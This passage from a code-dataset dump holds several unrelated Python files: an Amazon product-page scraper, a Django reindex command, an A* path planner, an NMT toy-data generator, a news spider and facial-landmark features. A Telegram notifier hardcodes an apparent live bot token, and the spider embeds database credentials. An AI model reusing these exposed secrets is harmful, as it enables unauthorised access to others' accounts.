'//*[@id=\"price\"]/table/tbody/tr[1]/td[2]/span[1]/text()')\n product.add_xpath('price', '//*[@id=\"priceblock_ourprice\" or @id=\"priceblock_dealprice\"]//text()')\n product.add_xpath('categories', '//*[@id=\"wayfinding-breadcrumbs_container\"]//li[not(contains(@class, \"a-breadcrumb-divider\"))]/span//text()')\n if response.css('.fbaBadge'):\n product.add_value('fba', True)\n \n offers = []\n print(response.css('.sopp-offer-enumerator').xpath('following-sibling::div'))\n for offer in response.css('.sopp-offer-enumerator').xpath('./following-sibling::div'):\n name = offer.xpath('.//*[@aria-hidden=\"true\"]').css('.sopp-offer-title').xpath('.//text()').get()\n description = offer.xpath('.//*[@aria-hidden=\"true\"]').css('.description').xpath('.//text()').extract()\n if not name == None:\n offers.append(\n {\n name: ''.join(description)\n }\n )\n product.add_value('offers', offers)\n # product.add_xpath('offers', '//*[@class=\"sopp-offer-title\"]/../span/text()[normalize-space(.)]')\n product.add_xpath('extra_features', '//*[@id=\"icon-farm-container\"]/div/div/div[2]//text()[normalize-space(.)]')\n product.add_xpath('expiry_date', '//*[@data-feature-name=\"expiryDate\"]//text()')\n product.add_xpath('availability', '//*[@id=\"availability\"]//text()')\n product.add_xpath('merchant_info', '//*[@id=\"merchant-info\"]//text()')\n product.add_xpath('olp', '//*[@data-feature-name=\"olp\"]//text()')\n styles = []\n index = 0\n for style in response.xpath('//*[@data-feature-name=\"twister\"]//ul/li'):\n name = style.xpath('./@title').get()\n asin = style.xpath('./@data-defaultasin').get()\n price = style.xpath(f'.//*[@id=\"style_name_{index}_price\" or @id=\"pattern_name_{index}_price\"]/span/text()').get()\n style_item = {\n \"name\": name,\n \"asin\": asin,\n \"price\": price\n }\n\n styles.append(style_item)\n index += 1\n product.add_value('styles', styles)\n product.add_xpath('design', '//*[@id=\"variation_pattern_name\"]/div/span/text()')\n product.add_xpath('features', '//*[@data-feature-name=\"featurebullets\"]//ul/li//text()')\n bsr_selector = response.xpath(\"//*[@id='SalesRank']//text()[not(parent::style)][normalize-space(.)]\")\n \n if bsr_selector:\n bsr = bsr_selector.getall()\n else:\n bsr_selector = response.xpath(\"//*[contains(@href,'/gp/bestsellers/')]/ancestor-or-self::*[(contains(.,'Rank') or contains(., 'rank')) and (contains(.,'sellers') or contains(.,'Sellers'))][1]\")\n bsr = bsr_selector[-1].xpath('.//text()[not(parent::style)][not(parent::noscript)][not(parent::script)]').getall()\n\n bsr = \"NOT_FOUND\" if bsr=='' or bsr is None or (len(bsr)>256)else bsr\n dfa_selector = response.xpath(\"//*[contains(., 'Date First Available')]\")\n if dfa_selector and len(dfa_selector) > 0:\n dfa = dfa_selector[-1].xpath('./..//text()[not(parent::style)][not(parent::noscript)][not(parent::script)]').getall()\n else:\n dfa = None\n dfa = \"NOT_FOUND\" if dfa=='' or dfa is None or (len(dfa)>256)else dfa\n # product.add_xpath('bsr', '//*[@id=\"SalesRank\"]//text()[not(parent::style)][normalize-space(.)]')\n # product.add_xpath('bsr', \"//a[contains(@href, '/gp/bestsellers/')]/../../*[contains(.//text(), 'in')][contains(.//text(), '#')]//text()\")\n # self.logger.info(bsr[-1].xpath('string(.//text())').getall())\n # product.add_xpath('bsr', \"//*[contains(@href,'/gp/bestsellers/')]/ancestor-or-self::*[(contains(.,'Rank') or contains(., 'rank')) and (contains(.,'sellers') or contains(.,'Sellers'))][1]//text()\")\n product.add_value('bsr', bsr)\n product.add_value('dfa', dfa)\n product.add_xpath('description', '//*[@id=\"productDescription\"]/p//text()')\n product.add_xpath('aplus_images', '//*[@id=\"aplus\"]//img/@src[not(contains(., \"gif\"))]')\n product.add_xpath('aplus_text', '//*[@id=\"aplus\"]//*[not(self::style)][not(self::noscript)][not(self::script)]/text()')\n customer_reviews = response.xpath('//*[@id=\"reviewsMedley\"]')\n\n star_ratings = {}\n print(response.xpath('//*[@id=\"reviewsMedley\"]//table[@id=\"histogramTable\"]'))\n for star_rating in customer_reviews.xpath('.//table[@id=\"histogramTable\"]//tr'):\n star = star_rating.xpath('./td[1]//a/text()[normalize-space(.)]').get()\n percentage = star_rating.xpath('./td[3]//a/text()[normalize-space(.)]').get()\n star_ratings[star] = percentage\n print(star_ratings)\n product.add_value('star_ratings', star_ratings)\n\n cr_summary = {}\n for summary in customer_reviews.xpath('//*[@id=\"cr-summarization-attributes-list\"]/div'):\n pivot = summary.xpath('.//i')\n attribute = pivot.xpath('./../preceding-sibling::*//span/text()').get()\n rating = pivot.xpath('./span/text()').get()\n cr_summary[attribute] = rating\n product.add_value('cr_summary', cr_summary)\n product.add_value('parse_time', {\"$date\": datetime.now().isoformat()})\n product.add_value('crawl_time', {\"$date\": datetime.fromisoformat(self.crawl_time).isoformat()})\n product.add_value('reprocessed', self.reprocessed)\n product.add_value('url', response.request.url)\n product.add_value('source_url', self.source_url)\n product.add_value('pipeline_id', self.pipeline_id)\n\n yield product.load_item()\n\n def __get_asin_info(self, response):\n parent_asin = None\n children = None\n try:\n\n js = response.xpath('//script[@type=\"text/javascript\"][contains(.,\"parentAsin\")]//text()').get()\n parsed_program = esprima.parseScript(js)\n # prased_program.body\n # print(prased_program)\n # json.dump('parsed_js', prased_program)\n properties = parsed_program.toDict().get('body')[0].get('expression').get('arguments')[-1].get(\"body\").get('body')[0].get('declarations')[0].get(\"init\").get('properties')\n # print(properties)\n for prop in properties:\n if prop.get(\"type\") == \"Property\" and prop.get('key').get('value') == \"parentAsin\":\n parent_asin = prop.get('value').get('value')\n if prop.get(\"type\") == \"Property\" and prop.get('key').get('value') == \"dimensionToAsinMap\":\n children_props = prop.get('value').get('properties')\n children = map(lambda child: child.get('value').get('value'), children_props)\n\n except Exception as err:\n self.logger.error(f\"An exception occurred {err}\")\n asin_info = {\n 'parent': parent_asin,\n 'children': children\n } \n print(asin_info)\n return asin_info \n # with open('parsed_js.js', 'w') as js_file:\n # js_file.writelines(json.dumps(parsed_program.toDict(), indent=2))\n\n def check_blocked(self, response):\n page_title = response.xpath('//title/text()').get()\n if page_title == \"Robot Check\":\n print(\n \"******************Blocked by Amazon**********************\")\n return True\n return False\n","sub_path":"amazon-product-page-parser/amazon-product-page-parser/amazon_product_page_parser/spiders/product_page_parser.py","file_name":"product_page_parser.py","file_ext":"py","file_size_in_byte":11087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"460659194","text":"from django.core.management.base import BaseCommand\nfrom elasticsearch_dsl import connections\nfrom api import models, settings\nfrom search.documents import Podcast\n\n\nclass Command(BaseCommand):\n help = 'Reindex all podcasts'\n\n def handle(self, *args, **options):\n self.reindex_podcasts()\n\n def reindex_podcasts(self, start_date=None):\n connections.create_connection(alias='default', hosts=[f'{settings.ELASTIC_HOST}'], timeout=20)\n Podcast._index.delete()\n print('Deleted podcast index.')\n if start_date:\n podcasts = models.Podcast.objects.filter(cdate__gte=start_date)\n else:\n podcasts = models.Podcast.objects.all()\n for podcast in podcasts:\n p = Podcast(**podcast.to_dict())\n p.save()\n print('Finished indexing all podcasts.')\n","sub_path":"api/management/commands/delete_and_index_podcasts.py","file_name":"delete_and_index_podcasts.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"30311811","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport math\nimport sys\nimport pygame\nimport numpy as np\n\n\n\n# In[2]:\n\n\n# - - Initial Node - -\nprint(\"Enter robot parameters\")\nrad=float(input(\"radius = \"))\nclr=float(input(\"clearence = \"))\n\nprint(\"Enter initial node cordinates\")\nxi=float(input(\"x = \"))\nyi=float(input(\"y = \"))\nndi=[xi,yi]\nprint(\"Enter goal node cordinates\")\nxg=float(input(\"x = \"))\nyg=float(input(\"y = \"))\ngoal=[xg,yg]\nr=int(input(\"Enter Resolution (must be an integer value) = \"))\n\ngoal= [n / r for n in goal]\nndi=[m / r for m in ndi]\n\nrows=150/r\ncoloums=250/r\n\n\n# In[3]:\n\n\ndef heu(node):\n h = math.sqrt ( (node[0] - goal[0])**2 + (node[1] - goal[1])**2 )\n return h\n\n\n# In[4]:\n\n\ndef left(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]-1\n n_nd[1]=ct_nd[1]\n cost=1\n return n_nd,cost\n\ndef right(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]+1\n n_nd[1]=ct_nd[1]\n cost=1\n return n_nd,cost\n\ndef down(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]\n n_nd[1]=ct_nd[1]+1\n cost=1\n return n_nd,cost\n\ndef up(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]\n n_nd[1]=ct_nd[1]-1\n cost=1\n return n_nd,cost\n\ndef down_left(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]-1\n n_nd[1]=ct_nd[1]+1\n cost=1.42\n return n_nd,cost\n\ndef up_left(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]-1\n n_nd[1]=ct_nd[1]-1\n cost=1.42\n return n_nd,cost\n \ndef up_right(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]+1\n n_nd[1]=ct_nd[1]-1\n cost=1.42\n return n_nd,cost\n \ndef down_right(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]+1\n n_nd[1]=ct_nd[1]+1\n cost=1.42\n return n_nd,cost\n\ndef obstacle_space_disp(x,y,r):\n c = 0\n if ((x-math.ceil(190/r))**2+math.ceil(y-(130/r))**2-math.ceil(15/r)**2)<=0:\n c=1\n if (2*x + 19*y - 1314/r <= 0) and (41*x+ 25*y -6525/r >= 0) and (y - 15/r>= 0) and (37*x +10*y - 6551/r <= 0):\n c=1\n if (38*x- 7*y - 5830/r >= 0) and (38*x + 23*y - 8530/r <= 0) and (37*x -20*y -6101/r <= 0) and (37*x +10*y - 6551/r >= 0):\n c=1\n if (x-math.floor(50/r) >= 0) and (x - math.floor(100/r) <= 0) and (y - math.floor(67.5/r) >= 0) and (y - math.floor(112.5/r) <= 0):\n c=1\n if ((x-math.ceil(140/r))/math.ceil(15/r))**2 + ((y - math.ceil(120/r))/math.ceil(6/r))**2 - 1 <=0:\n c=1\n return c\n\ndef obstacle_space(x,y,r,d=rad+clr):\n line1=(6525.0/25) - d*math.sqrt((-41.0/25)**2+1)\n line2=d*math.sqrt((-2.0/19)**2+1)+(1314.0/19)\n line3=d*math.sqrt((38.0/7)**2+1)-(5830.0/7)\n line4=(6101.0/20)-d*math.sqrt((37.0/20)**2+1)\n line5= d*math.sqrt((-38.0/23)**2+1) + (8530.0/23)\n line6l= (6551.0/10)- d*math.sqrt((-37.0/10)**2+1)\n line6r= d*math.sqrt((-37.0/10)**2+1) +(6551.0/10)\n q = 0\n if (x<(d/r))or (x>(250-d)/r) or (y<(d/r)) or (y>(150-d)/r):\n q=1\n if ((x-math.ceil(190/r))**2+(y-math.ceil(130/r))**2-(math.ceil((15+d)/r))**2)<0:\n q=1\n if ((2.0/19)*x + y - line2/r < 0) and (y+(41.0/25)*x -line1/r > 0) and (y - ((15-d)/r)> 0) and (y<(-37.0/10)*x+line6r/r):\n q=1\n if ((-38.0/7)*x +y - line3/r < 0) and ((38.0/23)*x + y - line5/r < 0) and ((-37.0/20)*x +y +line4/r > 0) and (y>(-37.0/10)*x+line6l/r):\n q=1\n if (x-math.floor((50-d)/r) > 0) and (x - math.floor((100+d)/r) < 0) and (y - math.floor((67.5-d)/r) > 0) and (y - math.floor((112.5+d)/r) < 0):\n q=1\n if ((x-math.ceil(140/r))/(math.ceil(15+d)/r))**2 + ((y - math.ceil(120/r))/(math.ceil(6+d)/r))**2 - 1 < 0:\n q=1\n return q\n\n# In[5]:\n\n\np_nd=[ndi]\nc_nd=[ndi]\nh_nd=[round(heu(ndi),2)]\nvp_nd=[]\nvc_nd=[]\nv_cst=[]\nvh_nd=[]\n\n\nif (obstacle_space(goal[0],goal[1],r)==1 or obstacle_space(ndi[0],ndi[1],r)):\n sys.exit(\"Either goal node or start node lies inside obstacle or outside the workspace\")\n\nif (ndi[0] not in range(0,251) or goal[0] not in range(0,251) or ndi[1] not in range(0,151) or goal[1] not in range(0,151)):\n sys.exit(\"Entered node cordinates are not integers or outside the workspace or invalid resolution\")\n\n\n# In[6]:\n\n\n\nx=0\ncst=[0]\nndx=ndi\nflag=0\nexit=0\ncount=0\nwhile(flag!=1 and c_nd!=[]):\n \n #--- UP Command ---\n nd,cost=up(ndx)\n if (nd[1]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- DOWN Command ---\n nd,cost=down(ndx)\n if (nd[1]<=rows and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n \n #--- LEFT Command ---\n nd,cost=left(ndx)\n if (nd[0]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n #--- RIGHT Command ---\n nd,cost=right(ndx)\n if (nd[0]<=coloums and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n \n #--- UP LEFT Command ---\n nd,cost=up_left(ndx)\n if (nd[1]>=0 and nd[0]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- UP RIGHT Command ---\n nd,cost=up_right(ndx)\n if (nd[0]<=coloums and nd[1]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- DOWN LEFT Command ---\n nd,cost=down_left(ndx)\n if (nd[1]<=rows and nd[0]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- DOWN RIGHT Command ---\n nd,cost=down_right(ndx)\n if (nd[1]<=rows and nd[0]<=coloums and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n \n vp_nd.append(p_nd.pop(x))\n vc_nd.append(c_nd.pop(x))\n v_cst.append(cst.pop(x))\n vh_nd.append(h_nd.pop(x))\n \n if(vc_nd[-1]==goal):\n flag=1\n \n if(flag!=1 and c_nd!=[]):\n x=h_nd.index(min(h_nd))\n ndx=c_nd[x][:]\n \nif(flag==0 and c_nd==[]): # Only this if statement was added after the late submission \n sys.exit(\"Path not found\")\n \n\n\nseq=[]\nseq.append(vc_nd[-1])\nseq.append(vp_nd[-1])\nx=vp_nd[-1]\ni=1\nwhile(x!=ndi):\n if(vc_nd[-i]==x):\n seq.append(vp_nd[-i])\n x=vp_nd[-i]\n i=i+1 \n\n\n\n\n\n\n# In[8]:\n\n\nobs_space = []\nfor i in range(0,251):\n for j in range(0,151):\n q=obstacle_space_disp(i,j,r)\n if q == 1:\n obs_space.append([i,j])\n\nk=2\nmy_list = np.array(vc_nd)\nvc_nd=my_list*k*r\nmy_list1 = np.array(seq)\nseq=my_list1*k*r\nmy_list2 = np.array(obs_space)\nobs_space = my_list2*k*r\n\n\npygame.init()\n\n#Defining the colors\nBlack = [0, 0, 0]\nred = [255, 0, 0]\nBlue = [0, 100, 255]\nWhite = [255, 255, 255]\n\n#Height and Width of Display\nSIZE = [250*k+r+r, 150*k+r+r]\nscreen = pygame.display.set_mode(SIZE)\n\npygame.display.set_caption(\"OUTPUT\")\nclock = pygame.time.Clock()\ndone = False\nwhile not done:\n for event in pygame.event.get(): \n if event.type == pygame.QUIT: \n done = True \n \n screen.fill(Black)\n#Printing the obstacles\n for i in obs_space:\n pygame.draw.rect(screen, Blue, [i[0],150*k-i[1],r*k,r*k])\n pygame.display.flip()\n clock.tick(20)\n#Printing the visited nodes\n for i in vc_nd:\n pygame.time.wait(1)\n pygame.draw.rect(screen, White, [i[0],150*k-i[1],r*k,r*k])\n pygame.display.flip()\n#Printing the path\n for j in seq[::-1]:\n pygame.time.wait(1)\n pygame.draw.rect(screen, red, [j[0], 150*k-j[1], r*k,r*k])\n pygame.display.flip()\n pygame.display.flip()\n\n pygame.time.wait(1500)\n done = True\npygame.quit()\n\n\n\n","sub_path":"ASTAR_RIGID.py","file_name":"ASTAR_RIGID.py","file_ext":"py","file_size_in_byte":11978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538152558","text":"import string\nimport sys\nimport random\nimport numpy as np\n\norig_stdout=sys.stdout\n\nn=15\nnum=10\nS=np.zeros(num)\nB=np.zeros(num)\n\nf1=open(\"vocab.src\",\"w+\")\nf2=open(\"vocab.tgt\",\"w+\")\nf3=open(\"train.src\",\"w+\")\nf4=open(\"train.tgt\",\"w+\")\nf5=open(\"dev.src\",\"w+\")\nf6=open(\"dev.tgt\",\"w+\")\nf7=open(\"test.src\",\"w+\")\nf8=open(\"test.tgt\",\"w+\")\n\nf1.write(\"\\n\\n\\n\")\nf2.write(\"\\n\\n\\n\")\n\nfor i in range(11,21):\n\tS[i-11]=i\n\tf1.write(str(i)+\"\\n\")\n\tf2.write(str(i)+\"\\n\")\nfor i in range(21,31):\n\tB[i-21]=i\n\tf1.write(str(i)+\"\\n\")\ninput_string=np.zeros(n)\npos=np.arange(n)\n\nfor s in range(1000):\n\tinput_string=np.zeros(n)\n\tk=random.randint(1,n/3)\n\tselected_char=np.random.choice(S,k,replace=False)\n\tselected_pos=np.random.choice(pos,k,replace=False)\n\t# print \"selected chars are \",selected_char\n\t# print \"selected pos are \",selected_pos\n\tfor i in range(k):\n\t\tinput_string[selected_pos[i]]=selected_char[i]\n\tfor i in range(n):\n\t\t#np.random.seed(i)\n\t\tif (int(input_string[i])==0):\n\t\t\tinput_string[i]=np.random.choice(B,1,replace=False)[0]\n\n\toutput_string=np.zeros(k)\n\tfor i in range(k):\n\t\toutput_string[i]=selected_char[i]\n\ttemp2=sorted(output_string)\n\t# print \"input \",input_string\n\t# print \"output \",temp2 \n\tif(s<900):\n\t\tfor j in range(len(input_string)):\n\t\t\tf3.write(str(int(input_string[j]))+\" \")\n\t\tf3.write(\"\\n\")\n\t\tfor j in range(len(temp2)):\n\t\t\tf4.write(str(int(temp2[j]))+\" \")\n\t\tf4.write(\"\\n\")\n\telif(s<950):\n\t\tfor j in range(len(input_string)):\n\t\t\tf5.write(str(int(input_string[j]))+\" \")\n\t\tf5.write(\"\\n\")\n\t\tfor j in range(len(temp2)):\n\t\t\tf6.write(str(int(temp2[j]))+\" \")\n\t\tf6.write(\"\\n\")\n\telse:\n\t\tfor j in range(len(input_string)):\n\t\t\tf7.write(str(int(input_string[j]))+\" \")\n\t\tf7.write(\"\\n\")\n\t\tfor j in range(len(temp2)):\n\t\t\tf8.write(str(int(temp2[j]))+\" \")\n\t\tf8.write(\"\\n\")","sub_path":"nmt/nmt_data/simple data/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149481605","text":"import requests\n\n\ndef notify(name, home, guest, winner):\n \"\"\"Use this function to send notifications via TG bot\n \"\"\"\n\n # Selecting the bot & chat \n bot_token = '739094059:AAFTJOeh61nstCgedtXx-oZqj1oWfgQGlwk'\n bot_chatID = \"@AlmanacBets\"\n\n # Sending bot a message\n send_text = 'https://api.telegram.org/bot' + \\\n bot_token + '/sendMessage?chat_id=' + bot_chatID + \\\n '&parse_mode=Markdown&text=' + '№4\\nБаскетбол' + '\\n' + name + '\\n' + \\\n home + ' - ' + guest + '\\n' + '2 четверть ' + winner\n requests.get(send_text)\n","sub_path":"notificator.py","file_name":"notificator.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"469872346","text":"from django.core.management.base import BaseCommand, CommandError\nfrom pyorg.models import Io\n\nclass Command(BaseCommand):\n help = 'Tests out the thing im testing'\n\n def add_arguments(self, parser):\n parser.add_argument('--test', nargs='+', type=int)\n\n def handle(self, *args, **options):\n test = options[\"test\"]\n if test:\n for t in options['test']:\n try:\n print(str(t)+\" was an arg\")\n \t\n except Exception as e:\n raise CommandError('test \"%s\" does not exist' % t)\n else:\n print(\"shoot\")\n print('ran cmd')\n","sub_path":"task/pyorg/management/commands/gettasks.py","file_name":"gettasks.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218542681","text":"from crawler.spiders import BaseSpider\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup as bs\nfrom scrapy.http import Request, Response\nimport re\nimport time\n\nclass KickerdailySpider(BaseSpider):\n name = 'kickerdaily'\n allowed_domains = ['kickerdaily.com']\n start_urls = [#'http://kickerdaily.com/',\n 'https://kickerdaily.com/posts/category/tagalog/',\n 'https://kickerdaily.com/posts/category/philippines/',\n 'https://kickerdaily.com/posts/category/world/',\n 'https://kickerdaily.com/posts/category/entertainment-world/',\n 'https://kickerdaily.com/posts/category/social-news/']\n website_id = 496\n language_id = 1880\n sql = { # sql配置\n 'host': '192.168.235.162',\n 'user': 'dg_admin',\n 'password': 'dg_admin',\n 'db': 'dg_crawler'\n }\n\n \n \n \n\n def parse(self, response):\n meta = {}\n soup = bs(response.text,\"html.parser\")\n category1 = soup.find(\"h1\",class_=\"page-title\").text.strip()\n meta[\"category1\"] = category1\n meta[\"category2\"] = None\n url_list = soup.select(\"#main-content > article\")\n for h in url_list:\n news_url = h.find(class_=\"entry-title mh-posts-list-title\").find(\"a\").get(\"href\")\n yield scrapy.Request(news_url,callback=self.parse_news,meta=meta)\n pub_time = soup.select(\"#main-content > article\")[-1].find(class_=\"mh-meta-date updated\").text\n if self.time == None or Util.format_time3(Util.format_time2(pub_time)) >= int(self.time):\n yield scrapy.Request(soup.select('a.next.page-numbers')[0].attrs['href'], callback=self.parse)\n else:\n self.logger.info('时间截止')\n\n def parse_news(self,response):\n item = NewsItem()\n soup = bs(response.text,\"html.parser\")\n item[\"category1\"] = response.meta[\"category1\"]\n item[\"category2\"] = response.meta[\"category2\"]\n pub_time = soup.find(\"span\",\"entry-meta-date updated\").find(\"a\").text.strip() if soup.find(\"span\",\"entry-meta-date updated\") else \"0000-00-00 00:00:00\"\n if pub_time:\n item[\"pub_time\"] = Util.format_time2(pub_time)\n\n div = soup.find(\"div\",class_=\"entry-content clearfix\")\n images = [img.get(\"src\") for img in div.find_all(\"img\")] if div.find_all(\"img\") else None\n item[\"images\"] = images\n title = soup.find(\"h1\",class_=\"entry-title\").text.strip()\n item[\"title\"] = title\n abstract1 = [a.text.strip() for a in div.find_all(\"li\") ]if div.find_all(\"li\") else div.find(\"p\").text.strip()\n abstract = ''\n for a in abstract1:\n abstract += a\n item[\"abstract\"] = abstract\n body = [p.text.strip() for p in div.find_all(\"p\")] if div.find_all(\"p\") else None\n body = \"\\n\".join(body)\n item[\"body\"] = body\n yield item\n","sub_path":"crawler/v1/kickerdaily.py","file_name":"kickerdaily.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537824256","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 15 11:03:35 2019\n\n\"\"\"\n\n#IMPORTS\nfrom imutils import face_utils\nimport imutils\nimport dlib\nimport cv2\nimport os\nfrom sklearn.linear_model import LogisticRegression\nimport pickle\nimport shutil\n\n\nparam = [] \nresult = []\n\n\n#FONCTIONS\ndef face_detection(rects):\n \"\"\"\n \"\"\"\n for (i, rect) in enumerate(rects):\n #Recupere les points du visages et les stock dans une liste\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n \n features = []\n features.append(dist_between_eyebrow(shape))\n features.append(dist_corner_eye_right(shape))\n features.append(dist_corner_eye_left(shape))\n features.append(dist_eyebrow_eye_right(shape))\n features.append(dist_eyebrow_eye_left(shape))\n features.append(dist_open_eye_right(shape))\n features.append(dist_open_eye_left(shape))\n features.append(dist_nose_width(shape))\n features.append(dist_nose_height(shape))\n features.append(dist_mouth(shape))\n features.append(dist_min_mouth(shape))\n features.append(dist_mouth_width(shape))\n features.append(dist_mouth_cheeks_right(shape))\n features.append(dist_mouth_cheeks_left(shape))\n features.append(dist_mouth_corner(shape))\n\n param.append(features)\n\n\n# EYES\ndef dist_between_eyebrow(shape):\n den = abs(float(shape[16][0] - shape[0][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[22][0] - shape[21][0])) / den\n return dist\n\ndef dist_corner_eye_right(shape):\n den = abs(float(shape[15][1] - shape[22][1]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[42][1] - shape[22][1])) / den\n return dist\n\n\ndef dist_corner_eye_left(shape):\n den = abs(float(shape[1][1] - shape[21][1]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[39][1] - shape[21][1])) / den\n return dist\n\n\ndef dist_eyebrow_eye_right(shape):\n den = abs(float(shape[41][1] - shape[19][1]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[37][1] - shape[19][1])) / den\n return dist\n\n\ndef dist_eyebrow_eye_left(shape):\n den = abs(float(shape[46][1] - shape[24][1]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[44][1] - shape[24][1])) / den\n return dist\n\n\ndef dist_open_eye_right(shape):\n den = abs(float(shape[45][0] - shape[42][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[47][1] - shape[43][1])) / den\n return dist\n\n\ndef dist_open_eye_left(shape):\n den = abs(float(shape[39][0] - shape[36][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[40][1] - shape[38][1])) / den\n return dist\n\n\n# NOSE\ndef dist_nose_width(shape):\n den = abs(float(shape[14][0] - shape[2][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[35][0] - shape[31][0])) / den\n return dist\n\n\ndef dist_nose_height(shape):\n den = abs(float(shape[6][1] - shape[27][1]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[31][1] - shape[27][1])) / den\n return dist\n\n\n# MOUTH\ndef dist_mouth(shape):\n width = abs(shape[54][0] - shape[48][0])\n height = abs(shape[57][1] - shape[51][1])\n if height == 0:\n height = 0.1\n\n dist = float(width) / float(height)\n return dist\n\n\ndef dist_min_mouth(shape):\n width = abs(shape[54][0] - shape[48][0])\n height = abs(shape[66][1] - shape[62][1])\n if height == 0:\n height = 